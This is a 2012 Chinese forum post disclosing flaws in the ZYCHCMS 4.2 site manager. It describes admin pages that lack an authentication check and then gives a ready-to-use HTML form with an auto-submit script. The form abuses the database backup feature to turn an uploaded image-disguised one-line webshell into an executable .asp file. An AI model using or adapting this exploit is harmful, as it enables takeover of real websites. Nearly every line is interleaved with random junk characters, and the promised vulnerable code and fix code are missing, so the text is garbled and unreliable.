- t& |5 g: D0 x& E, @+ c& o$ |- ], j/ r" @! z5 \
: ~' m3 i0 g( f q, r% J( n" j8 w
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)3 L$ Z# k. R/ B$ E; g
①SQL注射漏洞9 n& ?! x Z' w
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp0 D. l- G3 Y) H/ w; o! p1 \
漏洞原因:未过滤! ~1 R) Q4 B8 W$ X+ m' G0 k7 j9 }
漏洞代码:
+ t O7 p' w: i% N 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ d w, Y9 A/ O/ C+ }# i% j 修复方法:在文件开头加入代码
+ m) |% U6 a. s1 Y
+ X5 k* ? ?/ ?6 h, r7 R
) l2 l! M" g3 ^) n2 _/ i9 X& t②后台拿WBSHELL0 t6 n, N- l+ h2 y; p" \
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。 } S4 t* G7 P1 R8 n% J
这里在网上找了一个,改了下,将就着用。
; P7 v" U7 d$ H# e/ A 以下是代码本地提交代码
/ |, z9 |* C; j7 H$ f" @0 b' {2 w
" A8 P2 Z, B. I/ m* P- V6 d4 L! B- R. }+ o1 b
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
, z5 k* G' ]! [1 {7 w. Q' O <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
, i& d* v( n/ t% p% ^ <tr>
5 Q/ G* p# i; T8 x+ f. } <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
6 ~, q5 |. Q4 S/ E$ K' \2 ?7 ~. a </tr>- G9 Z5 v5 I! ~
<tr>9 D) P: H" ~; p, `( X: P1 ?
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>6 c- b/ k; ], E
</span>$ I+ Q* P' d) y- D' x
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >! F, c$ n. f9 Z
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
) t2 m6 w0 {1 W: Q1 w; _ <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
2 d' L; \( F4 M. R <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# \+ A h4 J# w' u$ \! m j9 H
<div align=”left”>) R: O0 h" r8 f
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
: S7 l# n& r( ]& ^7 g <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
/ f$ q% y* B: K' ` q <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
6 X% r5 D4 ]# S- O# X0 d' V </div></td>6 p: V4 C1 x- f+ |9 t! k
</tr>5 e' t4 L8 A; ~* D$ A" [. n# R/ ?
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>6 Y& a8 {5 s. A
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>- g# E' D0 o4 \- G9 l! l
<td class=”td”><div align=”left”>
, d' K+ O e, J8 l4 \ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
1 P# F: \9 ?- W( G9 j( } [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
7 `/ V. I) ~# p0 z6 _+ d </tr>
4 P8 H% Z& }- O3 j <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>9 p' }& q" g. q: u- ]' @/ ~
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
8 K2 y! G( j6 D7 _ <td class=”td”><div align=”left”>
; Y ], `" R+ j ~. S <input type=”submit” value=”确定备份” class=”btn”& w- u3 C8 g* n. K4 `( S3 W2 F
</div></td>
/ t0 Z, h2 ]: l* r </tr> o( {& D6 u! K' |. S
</table></td></tr></form>
* }- O- V. k8 s </table>
; V3 L7 _7 l- L" x- M9 ?# M </td>
' F2 n; M2 ^; P5 N3 o( q0 F& t0 F </tr>
3 I ?! x2 w5 g/ h, z% Z </table>
; A7 v6 ^7 f9 L3 X <script>
! c/ H2 o ^: P, h P, B document.all.add.submit();
2 h" ^6 Q) k5 U$ A6 H- ^) Y$ ]1 ^ </script>8 A& A; ^3 y9 c) ~
- O8 |8 c( e0 x& H- m
5 L; m9 t% d6 |8 Y- K3 ]" T
; n. l0 _8 \9 \/ T! g4 j. u) j6 [+ E" v9 _ B* }2 [& v
, b1 c$ L9 v# I
% K0 G6 B" P) k( x% Z# P8 |
1 ]+ m4 ?' W7 K, t% I
1 a: F" n0 ]& k- ~: x
$ A6 p2 X0 W- A' k6 J) L$ A
9 R! g2 W' ]" q' @( E$ X/ ^ |
发表于 2012-9-10 21:09:51
收藏
支持
反对